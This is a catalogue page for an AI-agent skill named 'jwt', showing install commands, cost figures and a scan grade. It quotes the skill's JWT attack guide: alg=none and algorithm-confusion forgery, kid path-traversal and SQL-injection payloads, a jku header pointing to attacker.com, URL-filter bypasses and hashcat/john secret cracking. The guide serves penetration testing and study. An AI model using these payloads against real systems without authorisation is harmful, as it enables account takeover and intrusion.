Getting it into your agent
It runs from inside its repository, so the clone comes first — what it calls does not travel with the file alone.
git clone --depth 1 https://github.com/MingyiSecLab/Mingyi-Atlasnpx agentmods add skills/mingyiseclab/mingyi-atlas/jwtWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/jwt)<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/jwt"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/jwt/github.svg" alt="Measured on agentmods" height="20"></a>Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.
<a href="https://agentmods.dev/skills/mingyiseclab/mingyi-atlas/jwt"><img src="https://agentmods.dev/badge/skills/mingyiseclab/mingyi-atlas/jwt.svg" alt="Reviewed on agentmods" width="80" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5.1 | $0.00039 | $0.01437 |
| Opus 5 | $0.00019 | $0.00718 |
| Sonnet 5 | $0.00008 | $0.00287 |
| Haiku 4.5 | $0.00004 | $0.00144 |
Grade A, and why
jwt scanned grade A with 1 finding against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 9d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Makes network callslowCapability
Not a fault in itself. Listed so you know the mod talks to something, and to what.
curl -s https://target/.well-known/jwks.json | jq -r '.keys[0]' This is a copy
100% identical to jwt — 0 lines differ, which has more behind it and is treated as the original. This page carries a canonical link to it rather than competing with it.
How it starts
The opening of the file, as written. The whole thing — 141 lines — stays where its author put it; the contents beside it link to each section on GitHub.
JSON Web Token Attacks
JWTs are signed (HS256/RS256/ES256) or sometimes mis-configured to
accept none. The header carries the alg + optionally kid/jku/x5u
references. Each is a potential exploitation surface.
1. Anatomy
header.payload.signature — each base64url. Decode w/ jwt_tool or
jwt-cracker:
jwt_tool eyJhbGc... # decode + verify + tamper modes
echo "$JWT" | cut -d. -f1-2 | tr '_-' '/+' | base64 -d 2>/dev/null
2. Attack surface
2.1 alg=none bypass
Set {"alg":"none"} in header, strip signature, send header.payload.:
jwt_tool $JWT -X a # alg=none attack
Worked on auth0 / pyjwt / many home-rolled libs pre-2017. Still appears in legacy systems.
2.2 HS256 vs RS256 confusion
Server uses RS256 (asymmetric) and verifies w/ public key. Attacker
switches alg to HS256 and signs w/ the public key (which the server
will use as the HMAC secret):
# Get the public key
curl -s https://target/.well-known/jwks.json | jq -r '.keys[0]'
# Or pull from a redirect / unauth /pubkey endpoint
jwt_tool $JWT -X k -pk public.pem # alg confusion attack
2.3 kid header injection
kid (key ID) sometimes resolves to a file path or DB key:
{"alg":"HS256","kid":"../../../dev/null"} // sign with empty content
{"alg":"HS256","kid":"key1' UNION SELECT 'mykey"} // SQLi in kid lookup
jwt_tool -X i -I -hc kid -hv path chains kid injection variants.
2.4 jku / x5u URL injection
jku (JWK Set URL) tells the server WHERE to fetch keys. If unvalidated,
attacker hosts their own:
{"alg":"RS256","jku":"https://attacker.com/jwks.json"}
Then https://attacker.com/jwks.json returns attacker's public key,
signed JWT is "valid".
Bypass URL filters via:
- subdomain confusion (
https://target.com.attacker.com/jwks.json) - userinfo (
https://[email protected]/jwks.json) - redirect chains via target's open-redirect
2.5 Weak HMAC secret
HS256 with weak secret crackable offline:
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
john --format=HMAC-SHA256 jwt.txt --wordlist=rockyou.txt
Hashcat mode 16500 = JWT. Service-account secrets often dev/secret/
changeme/company-name patterns.
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 9d ago First seen · 141 lines · 39 tokens per session scan A 8d4ce4086173
jwt is a skill published in the GitHub repository MingyiSecLab/Mingyi-Atlas (11 stars, last pushed 2mo ago), licensed Apache-2.0. It adds 39 tokens to every session and 1,437 once invoked, about $0.0002 per session on Opus 5. A static security scan graded it A with 1 finding (makes network calls). It is 100% identical to jwt, differing in 0 lines, and is treated as a copy.
Other skills, from other repositories
web-app-pentest
../../../pentest/web-app-pentest/SKILL.md.
cis-aws-foundations-6.5
Ensure the default security group of every VPC restricts all traffic.
cis-aws-foundations-2.1.3
Ensure Organizations management account is not used for workloads.
cis-aws-foundations-2.12
Ensure access keys are rotated every 90 days or less.
cis-aws-foundations-2.7
Eliminate use of the 'root' user for administrative and daily tasks.
cis-aws-foundations-4.4
Ensure that server access logging is enabled on the CloudTrail S3 bucket.